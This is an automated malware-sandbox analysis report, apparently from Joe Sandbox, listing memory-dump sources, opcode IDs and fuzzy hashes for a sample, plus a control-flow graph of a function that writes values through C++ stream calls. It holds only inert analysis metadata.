                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 954158c77ccbb84d33b3060ab461d5729eef0503c0e04979f62f7c81a2405d5e
                                                                                                                                                                        • Instruction ID: d95a20d660a150da009e150c1a3d144058925ed1b82cde52e9c5852d82add8cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 954158c77ccbb84d33b3060ab461d5729eef0503c0e04979f62f7c81a2405d5e
                                                                                                                                                                        • Instruction Fuzzy Hash: EA22F932A086C596E761AF36C8412BAF790FF15B84FAC8735DE0D67694DF28B854C720
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e56559d32143294df18fcb3f06836c56c6a50a9099051d8b58257210e4906dd7
                                                                                                                                                                        • Instruction ID: 9468fb5da763af319dcfbc595fcf7cabf227c8b1abe2b47a8aad50e1267dbb1f
                                                                                                                                                                        • Opcode Fuzzy Hash: e56559d32143294df18fcb3f06836c56c6a50a9099051d8b58257210e4906dd7
                                                                                                                                                                        • Instruction Fuzzy Hash: FDF1D923D28B8D55E212A63398424BAF260BFBF3C4F6DEB22FD44355B1DF286591E510
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e62e9768c4b7d9ebd90fcf672ed0911d0ffdc2bc6b7ec08736c44369b529a20b
                                                                                                                                                                        • Instruction ID: 6797da9aa91aa9ccddfb05d1c4a45515dc2d50f89b6e0149dcc1381e52c02f4f
                                                                                                                                                                        • Opcode Fuzzy Hash: e62e9768c4b7d9ebd90fcf672ed0911d0ffdc2bc6b7ec08736c44369b529a20b
                                                                                                                                                                        • Instruction Fuzzy Hash: 23D1DD37C1879D95E652A637E8420B6F390BF7E341F6DDB32E948720A1DB247A85C620
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4d6dab013597353d29ce7371f126fb81377ed1b338f44294501ba794004554e1
                                                                                                                                                                        • Instruction ID: 4bcf73ea888b92e489ab80092d3b49f6236a4172d7653f4e87ec8ff5031a61e9
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d6dab013597353d29ce7371f126fb81377ed1b338f44294501ba794004554e1
                                                                                                                                                                        • Instruction Fuzzy Hash: C1A1F472D0A24A56E657A533D96237AE6807F2A784F7CCB36DD0C33C91DF297894C620
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7dbd8b444158c471a74cfaf9cfe530617b902bfb49a01d84fc162881d71c4006
                                                                                                                                                                        • Instruction ID: 78a05b0b07d82027544ef796688e843d4bda953177543a2a06189a0e29af178a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7dbd8b444158c471a74cfaf9cfe530617b902bfb49a01d84fc162881d71c4006
                                                                                                                                                                        • Instruction Fuzzy Hash: 81A1D132A18AD49EE701DF7AD4412FDBBB0BB49349F648325EF4532A65DB386981CB10
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                        • Instruction ID: 39106d23098d48e51d1575eb83840c78965102d3bbcb8fb7038a0b7b7c5db960
                                                                                                                                                                        • Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                        • Instruction Fuzzy Hash: 725117A6B284B147DA109F2AD8816BC77D1E746B43FE48076D65882F92C52EC50ADF30
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                        • Instruction ID: df48c4bb6e511f22f4ee92146fd74705281a64b3694a4daab5e958b7892bc084
                                                                                                                                                                        • Opcode Fuzzy Hash: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F41BB21F4D399D1E521B563994017AE293BF6A780FB8C732DD5C37A84DB38F881DA01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                        • Instruction ID: 53855e27d0a5ced7837c0220750abf2b015fb6335923171befd35c1fe2738d41
                                                                                                                                                                        • Opcode Fuzzy Hash: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                        • Instruction Fuzzy Hash: 30416373B1158487E78CCE2AC8166AE73A3B399304F95C239DA0A87385DA359905CB44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
                                                                                                                                                                        • Instruction ID: 9b5d14dbf28be45a5e2c65484f783f79abda70775993ef5bf2f2ea902b64f5a4
                                                                                                                                                                        • Opcode Fuzzy Hash: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
                                                                                                                                                                        • Instruction Fuzzy Hash: 4131243B724A5657EF488634E922B797691F341300FC9A639EE4AC66C6DB2CD811C710
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 93d099d0a7a09c573673c3b0691e11a081a65ef6266a5134ff14cdfb100920a0
                                                                                                                                                                        • Instruction ID: 79abcf9a709a6c4f07366a4eecbdb8b808bafd1d63576f02701c59a775b7409b
                                                                                                                                                                        • Opcode Fuzzy Hash: 93d099d0a7a09c573673c3b0691e11a081a65ef6266a5134ff14cdfb100920a0
                                                                                                                                                                        • Instruction Fuzzy Hash: DAA00131A0889AE0E64AAB80AD50023A232FB90304FA00031D40D411A0DF6CA804CA21

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1235 7ff786613420-7ff78661388a memset call 7ff786629540 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff786629c80 1240 7ff7866138ac-7ff78661390f call 7ff7866294d0 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff78662c970 1235->1240 1241 7ff78661388c-7ff7866138ab ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 1235->1241 1241->1240
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.VCRUNTIME140 ref: 00007FF786613450
                                                                                                                                                                          • Part of subcall function 00007FF786629540: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF78662957B
                                                                                                                                                                          • Part of subcall function 00007FF786629540: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF78662959A
                                                                                                                                                                          • Part of subcall function 00007FF786629540: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7866295CC
                                                                                                                                                                          • Part of subcall function 00007FF786629540: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7866295E7
                                                                                                                                                                          • Part of subcall function 00007FF786629540: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF786629633
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661346F
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661347F
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613491
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866134A1
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866134B3
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866134C3
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866134D5
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866134E5
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7866134F6
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613506
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF786613517
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613527
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF786613538
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613548
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661355A
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661356A
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF78661357B
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661358B
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661359D
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866135AD
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7866135BE
                                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866135CE
